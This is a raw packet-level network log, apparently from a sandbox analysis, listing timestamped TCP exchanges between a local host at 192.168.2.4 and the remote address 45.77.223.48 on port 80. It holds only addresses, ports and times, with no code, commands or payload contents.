Apr 25, 2024 09:42:51.902297974 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.902535915 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.902571917 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.902663946 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.902698994 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.902707100 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.902741909 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:51.902807951 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:51.902842999 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.024888992 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:52.025017977 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.025063992 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:52.025084972 CEST	80	49791	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:52.025120974 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.025120974 CEST	49791	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.039997101 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.167332888 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:52.167485952 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.171896935 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.299060106 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:52.299145937 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:52.426544905 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.244693041 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.244715929 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.244733095 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.244803905 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.244910002 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.251873016 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.251933098 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.252248049 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.252300024 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.252516031 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.252567053 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.252655029 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.252681017 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.252707005 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.252738953 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.252847910 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.252892017 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.252897024 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.252943039 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.371999025 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.372019053 CEST	80	49792	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.372088909 CEST	49792	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.380656004 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.508254051 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.508357048 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.510184050 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.637285948 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:53.637377024 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:53.764470100 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.453133106 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.453160048 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.453234911 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.453275919 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.461505890 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.461592913 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.461931944 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.461980104 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.462101936 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.462147951 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.462296009 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.462342024 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.462393999 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.462436914 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.462497950 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.462543011 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.462551117 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.462594032 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.462606907 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.462672949 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.580554962 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.580579042 CEST	80	49793	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.580605030 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.580671072 CEST	49793	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.591922998 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.717844963 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.718010902 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.719782114 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.845622063 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:54.845704079 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:54.976958990 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.652230024 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.652302980 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.652324915 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.652359962 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.652367115 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.652406931 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.661103010 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.661145926 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.661510944 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.661551952 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.661721945 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.661762953 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.662125111 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.662143946 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.662159920 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.662166119 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.662178040 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.662179947 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.662194014 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.662209034 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.778296947 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.778361082 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.778434992 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.778474092 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.778479099 CEST	80	49794	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.778520107 CEST	49794	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.826013088 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.952043056 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:55.952152014 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:55.953897953 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.079838991 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.079916954 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.205887079 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.925452948 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.925470114 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.925493956 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.925529957 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.925609112 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.925635099 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.925677061 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.925757885 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.925801992 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.945918083 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.945980072 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.946613073 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.946665049 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.946772099 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.946821928 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.946878910 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.946923971 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:56.947030067 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:56.947071075 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:57.051387072 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:57.051435947 CEST	80	49795	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:57.051512003 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:57.051512003 CEST	49795	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:57.067667961 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:57.198595047 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:57.198668957 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:57.200453997 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:57.331242085 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:57.331301928 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:57.462212086 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.137273073 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.137393951 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.137542009 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.137554884 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.137589931 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.137590885 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.137610912 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.137625933 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.146480083 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.146522999 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.146853924 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.146893024 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.146895885 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.146930933 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.147001982 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.147041082 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.147505045 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.147531986 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.147555113 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.147576094 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.268285036 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.268331051 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.268495083 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.268523932 CEST	80	49796	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.268542051 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.268563032 CEST	49796	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.271640062 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.402467012 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.402548075 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.404315948 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.534991980 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:58.535094976 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:58.665749073 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.476314068 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.476459980 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.476520061 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.476566076 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.486028910 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.486095905 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.486440897 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.486484051 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.486558914 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.486603975 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.486702919 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.486742020 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.486818075 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.486859083 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.486874104 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.486917973 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.486969948 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.487013102 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.487020016 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.487073898 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.607675076 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.607696056 CEST	80	49797	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.607733011 CEST	49797	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.613481998 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.744189024 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.744265079 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.746040106 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:59.876629114 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:59.876717091 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.007450104 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.707429886 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.707539082 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.707573891 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.707585096 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.707643032 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.707643986 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.716109991 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.716180086 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.716623068 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.716671944 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.716753960 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.716799974 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.716891050 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.716937065 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.717068911 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.717113018 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.717118979 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.717161894 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.717204094 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.717250109 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.838181973 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.838238001 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.838426113 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.838455915 CEST	80	49798	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.838474989 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.838506937 CEST	49798	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.851005077 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.983926058 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:00.984008074 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:00.985732079 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.119302988 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.119400024 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.253351927 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.951961994 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.952042103 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.952116966 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.952159882 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.952295065 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.952333927 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.952439070 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.952470064 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.952745914 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.952781916 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.952931881 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.952970028 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.953176022 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.953210115 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.963268995 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.963310957 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.963939905 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.963975906 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:01.964215040 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:01.964255095 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:02.082428932 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:02.085232973 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:02.085282087 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:02.085407972 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:02.085424900 CEST	80	49799	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:02.085453033 CEST	49799	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:02.209814072 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:02.209907055 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:02.240601063 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:02.368515968 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:02.368654013 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:02.495765924 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.218880892 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.218997955 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.219075918 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.219140053 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.228153944 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.228231907 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.228506088 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.228638887 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.228689909 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.228804111 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.228997946 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.229038954 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.229065895 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.229095936 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.229140997 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.346271992 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.346316099 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.346379042 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.351871967 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.351890087 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.351969004 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.363032103 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.363104105 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.363142967 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.372658968 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.372694016 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.372756958 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.382370949 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.382405043 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.382463932 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.391880035 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.391959906 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.392018080 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.401542902 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.401578903 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.401647091 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.411174059 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.411221027 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.411276102 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.422077894 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.422147989 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.422216892 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.430676937 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.430725098 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.430780888 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.473752022 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.473778963 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.473876953 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.478317976 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.478375912 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.478431940 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.487246037 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.487272978 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.487332106 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.494909048 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.494921923 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.494985104 CEST	49800	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:03.502655029 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.502682924 CEST	80	49800	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:03.502749920 CEST	49800	80	192.168.2.4	45.77.223.48
